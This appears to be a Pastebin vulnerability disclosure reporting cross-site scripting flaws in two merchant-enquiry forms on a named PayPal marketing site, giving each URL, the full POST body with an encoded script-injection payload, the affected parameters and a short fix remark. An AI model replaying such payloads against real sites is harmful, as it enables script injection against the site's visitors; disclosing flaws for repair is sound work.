Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Number of Vulnerabilities : 2
- ___________________________________________________________________________________________
- --- Vulnerability # No- 1:
- ___________________________________________________________________________________________
- +URL: https://www.paypal-marketing.com.hk/merchant-enquiries/index.php
- +Vulnerability Type: Cross Site Scripting (XSS)
- + Form Action : POST
- +POST Data Sent to Produce the Bug :
- token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1
- --Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting .
- And, the filed name (company_name) with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here .
- +POST Parameters that cause XSS Vulnerability in this Page :
- company_name , business_type_other,business_need_other, contact_person ,contact_person2, phone,phone2, email,email2
- +How to fix :
- -- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to return malicious on webpage like Cross Site Scripting attack
- ___________________________________________________________________________________________
- Vulnerability No. # 2 :
- ___________________________________________________________________________________________
- +URL: https://www.paypal-marketing.com.hk/merchant-enquiries/index-zh.php
- +Vulnerability Type: Cross Site Scripting (XSS)
- + Form Action : POST
- +POST Data Sent to Produce the Bug :
- token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1
- --Here, the field name with field value vulnerable_field are all vulnerable to cross site scripting .
- And, the filed name (company_name) with value %22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used here to produce the XSS bug here .
- +POST Parameters that cause XSS Vulnerability in this Page :
- company_name , business_type_other,business_need_other, contact_person ,contact_person2, phone,phone2, email,email2
- +How to fix :
- -- Though this page uses a java script function to validate this form, but it fails to sanitize the all characters which could allow hackers or pen testers to return malicious on webpage like Cross Site Scripting attack
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement